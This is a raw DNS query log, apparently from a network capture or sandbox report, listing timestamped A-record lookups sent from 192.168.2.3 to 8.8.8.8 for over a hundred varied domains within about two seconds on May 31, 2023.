                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.221273899 CEST192.168.2.38.8.8.80x4472Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.236723900 CEST192.168.2.38.8.8.80x69aeStandard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.248579025 CEST192.168.2.38.8.8.80x8653Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.251025915 CEST192.168.2.38.8.8.80x3a7dStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.269772053 CEST192.168.2.38.8.8.80xfca8Standard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.273760080 CEST192.168.2.38.8.8.80xa6a5Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.273961067 CEST192.168.2.38.8.8.80xc580Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.276973009 CEST192.168.2.38.8.8.80xb5f6Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.276973009 CEST192.168.2.38.8.8.80x2132Standard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.283341885 CEST192.168.2.38.8.8.80x190fStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.310110092 CEST192.168.2.38.8.8.80x3b91Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.317212105 CEST192.168.2.38.8.8.80xa652Standard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.335972071 CEST192.168.2.38.8.8.80x48e5Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.345772028 CEST192.168.2.38.8.8.80xc0eeStandard query (0)pccj.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.345772028 CEST192.168.2.38.8.8.80x284aStandard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.359735012 CEST192.168.2.38.8.8.80x946aStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.367882013 CEST192.168.2.38.8.8.80x13c7Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.377748013 CEST192.168.2.38.8.8.80x8fe1Standard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.394062042 CEST192.168.2.38.8.8.80xea65Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.394673109 CEST192.168.2.38.8.8.80x3844Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.395291090 CEST192.168.2.38.8.8.80x41ecStandard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.436295986 CEST192.168.2.38.8.8.80x5dd0Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.443177938 CEST192.168.2.38.8.8.80xe409Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.443177938 CEST192.168.2.38.8.8.80xf28cStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.446126938 CEST192.168.2.38.8.8.80x2344Standard query (0)bossinst.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.447491884 CEST192.168.2.38.8.8.80x5c41Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.447491884 CEST192.168.2.38.8.8.80x533fStandard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.450527906 CEST192.168.2.38.8.8.80xe5d7Standard query (0)aoinko.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.456437111 CEST192.168.2.38.8.8.80x32f2Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.467458010 CEST192.168.2.38.8.8.80x188aStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.471668959 CEST192.168.2.38.8.8.80x8ef0Standard query (0)banvari.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.473678112 CEST192.168.2.38.8.8.80x383Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.500142097 CEST192.168.2.38.8.8.80x678cStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.504060984 CEST192.168.2.38.8.8.80x6e6cStandard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.508430958 CEST192.168.2.38.8.8.80x398fStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.553457975 CEST192.168.2.38.8.8.80xc589Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.557612896 CEST192.168.2.38.8.8.80x6e32Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.571707010 CEST192.168.2.38.8.8.80xa458Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.571707010 CEST192.168.2.38.8.8.80xfdb9Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.576441050 CEST192.168.2.38.8.8.80xb561Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.582690001 CEST192.168.2.38.8.8.80xb9b0Standard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.585227966 CEST192.168.2.38.8.8.80xa023Standard query (0)awal.wsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.590265989 CEST192.168.2.38.8.8.80xe239Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.608082056 CEST192.168.2.38.8.8.80x691eStandard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.618865013 CEST192.168.2.38.8.8.80xc278Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.622775078 CEST192.168.2.38.8.8.80xc28dStandard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.624919891 CEST192.168.2.38.8.8.80xd60eStandard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.628448963 CEST192.168.2.38.8.8.80x9416Standard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.631094933 CEST192.168.2.38.8.8.80xc72Standard query (0)metaforacom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.636092901 CEST192.168.2.38.8.8.80xe219Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.691675901 CEST192.168.2.38.8.8.80xc511Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.707483053 CEST192.168.2.38.8.8.80x6ca1Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.712886095 CEST192.168.2.38.8.8.80x8021Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.718516111 CEST192.168.2.38.8.8.80xb601Standard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.726207972 CEST192.168.2.38.8.8.80x9f3cStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.748325109 CEST192.168.2.38.8.8.80x9c4cStandard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.772635937 CEST192.168.2.38.8.8.80x8745Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.804414034 CEST192.168.2.38.8.8.80x9853Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:02.832096100 CEST192.168.2.38.8.8.80x512fStandard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.003360033 CEST192.168.2.38.8.8.80x2952Standard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.007258892 CEST192.168.2.38.8.8.80xaaStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.007258892 CEST192.168.2.38.8.8.80xef75Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.012984991 CEST192.168.2.38.8.8.80xc5edStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.014847040 CEST192.168.2.38.8.8.80x7c07Standard query (0)muhr-soehne.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.017607927 CEST192.168.2.38.8.8.80x1adaStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.018986940 CEST192.168.2.38.8.8.80x9bStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.037396908 CEST192.168.2.38.8.8.80xcbb7Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.042360067 CEST192.168.2.38.8.8.80xf235Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.091986895 CEST192.168.2.38.8.8.80x1390Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.118396997 CEST192.168.2.38.8.8.80xa7d6Standard query (0)hubbikes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.143337965 CEST192.168.2.38.8.8.80x4413Standard query (0)sledsport.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.167272091 CEST192.168.2.38.8.8.80x647eStandard query (0)dbnet.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.175097942 CEST192.168.2.38.8.8.80x7368Standard query (0)dwid.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.180735111 CEST192.168.2.38.8.8.80x9394Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.198247910 CEST192.168.2.38.8.8.80x41d1Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.199656010 CEST192.168.2.38.8.8.80x4b2aStandard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.200340986 CEST192.168.2.38.8.8.80x8d24Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.222615957 CEST192.168.2.38.8.8.80x2869Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.255373001 CEST192.168.2.38.8.8.80x4ec2Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.268563032 CEST192.168.2.38.8.8.80x4f43Standard query (0)flamingorecordings.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.272700071 CEST192.168.2.38.8.8.80xcf19Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.276856899 CEST192.168.2.38.8.8.80xdc64Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.278584957 CEST192.168.2.38.8.8.80x6c3cStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.281621933 CEST192.168.2.38.8.8.80x9113Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.286243916 CEST192.168.2.38.8.8.80xb0f6Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.287921906 CEST192.168.2.38.8.8.80xaa2Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.307178020 CEST192.168.2.38.8.8.80x1c96Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.315598965 CEST192.168.2.38.8.8.80x7b6bStandard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.322422981 CEST192.168.2.38.8.8.80xfd42Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.325022936 CEST192.168.2.38.8.8.80xd4d3Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.331351042 CEST192.168.2.38.8.8.80x22ddStandard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.347470045 CEST192.168.2.38.8.8.80x67a2Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.350445032 CEST192.168.2.38.8.8.80xaf44Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.352680922 CEST192.168.2.38.8.8.80xac3Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.357559919 CEST192.168.2.38.8.8.80x6455Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.362313032 CEST192.168.2.38.8.8.80xa0caStandard query (0)bosado.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.368774891 CEST192.168.2.38.8.8.80x8c98Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.376724005 CEST192.168.2.38.8.8.80xa042Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.396145105 CEST192.168.2.38.8.8.80x5c56Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.401134968 CEST192.168.2.38.8.8.80x3301Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.420181990 CEST192.168.2.38.8.8.80xea65Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.421509027 CEST192.168.2.38.8.8.80xdf53Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.424199104 CEST192.168.2.38.8.8.80x5814Standard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.427015066 CEST192.168.2.38.8.8.80x1321Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.431974888 CEST192.168.2.38.8.8.80x8c7bStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.462909937 CEST192.168.2.38.8.8.80x8ac6Standard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.473804951 CEST192.168.2.38.8.8.80xffdcStandard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.476069927 CEST192.168.2.38.8.8.80x1988Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.479017973 CEST192.168.2.38.8.8.80xf8e8Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.486690044 CEST192.168.2.38.8.8.80xb438Standard query (0)shenhgts.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.488553047 CEST192.168.2.38.8.8.80x9533Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.493803978 CEST192.168.2.38.8.8.80x65b8Standard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.514252901 CEST192.168.2.38.8.8.80xb53aStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.519783974 CEST192.168.2.38.8.8.80x863dStandard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.522555113 CEST192.168.2.38.8.8.80xb150Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.542566061 CEST192.168.2.38.8.8.80x8e2aStandard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.546004057 CEST192.168.2.38.8.8.80xf4b5Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.550281048 CEST192.168.2.38.8.8.80xe4e9Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.553221941 CEST192.168.2.38.8.8.80xee00Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.579622984 CEST192.168.2.38.8.8.80xdc8aStandard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.585423946 CEST192.168.2.38.8.8.80x5050Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.587189913 CEST192.168.2.38.8.8.80x9c9Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.587565899 CEST192.168.2.38.8.8.80xfc93Standard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.588915110 CEST192.168.2.38.8.8.80x9a76Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.595365047 CEST192.168.2.38.8.8.80x4886Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.614844084 CEST192.168.2.38.8.8.80xaee8Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.636260033 CEST192.168.2.38.8.8.80xe629Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.690392971 CEST192.168.2.38.8.8.80x27f4Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.692807913 CEST192.168.2.38.8.8.80xc1cbStandard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.716392994 CEST192.168.2.38.8.8.80x73c6Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.717020035 CEST192.168.2.38.8.8.80x8021Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.777952909 CEST192.168.2.38.8.8.80x402Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.801002026 CEST192.168.2.38.8.8.80xd681Standard query (0)clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.828785896 CEST192.168.2.38.8.8.80xdf9eStandard query (0)nettle.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.833491087 CEST192.168.2.38.8.8.80x6ebbStandard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.840447903 CEST192.168.2.38.8.8.80x99c6Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.842539072 CEST192.168.2.38.8.8.80xeb2aStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.881052971 CEST192.168.2.38.8.8.80xb88fStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.887824059 CEST192.168.2.38.8.8.80xf3e3Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.901071072 CEST192.168.2.38.8.8.80x2337Standard query (0)diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.912599087 CEST192.168.2.38.8.8.80xb041Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.944664001 CEST192.168.2.38.8.8.80x3c31Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.948309898 CEST192.168.2.38.8.8.80x3000Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:03.975922108 CEST192.168.2.38.8.8.80xaf39Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.007209063 CEST192.168.2.38.8.8.80xad3Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.009073019 CEST192.168.2.38.8.8.80xf030Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.029834032 CEST192.168.2.38.8.8.80xa2bdStandard query (0)insia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.058536053 CEST192.168.2.38.8.8.80x74b5Standard query (0)ldh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.112796068 CEST192.168.2.38.8.8.80x1114Standard query (0)www.diamir.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.118026972 CEST192.168.2.38.8.8.80xe08Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.123802900 CEST192.168.2.38.8.8.80x774eStandard query (0)strazynski.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.129966021 CEST192.168.2.38.8.8.80x9653Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.153122902 CEST192.168.2.38.8.8.80x613bStandard query (0)kallman.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.154999971 CEST192.168.2.38.8.8.80x2f86Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.183741093 CEST192.168.2.38.8.8.80xccf7Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.186024904 CEST192.168.2.38.8.8.80x7747Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.190846920 CEST192.168.2.38.8.8.80x69e4Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.217056036 CEST192.168.2.38.8.8.80x4682Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.223555088 CEST192.168.2.38.8.8.80xdf0cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.225068092 CEST192.168.2.38.8.8.80xf1eStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.226875067 CEST192.168.2.38.8.8.80xe0aeStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.231316090 CEST192.168.2.38.8.8.80xdd42Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.238075972 CEST192.168.2.38.8.8.80xb62Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.253388882 CEST192.168.2.38.8.8.80xc16bStandard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.261209965 CEST192.168.2.38.8.8.80xdbc5Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.262630939 CEST192.168.2.38.8.8.80x54e0Standard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.293967009 CEST192.168.2.38.8.8.80xaa2Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.317491055 CEST192.168.2.38.8.8.80x1c9dStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.340046883 CEST192.168.2.38.8.8.80xb176Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.349071026 CEST192.168.2.38.8.8.80xfbc4Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.371793032 CEST192.168.2.38.8.8.80x86d2Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.382307053 CEST192.168.2.38.8.8.80xb6e4Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.419677973 CEST192.168.2.38.8.8.80x8a82Standard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.421138048 CEST192.168.2.38.8.8.80xdf23Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.468494892 CEST192.168.2.38.8.8.80xd379Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:52:04.473299026 CEST192.168.2.38.8.8.80x992aStandard query (0)toundo.netA (IP address)IN (0x0001)false
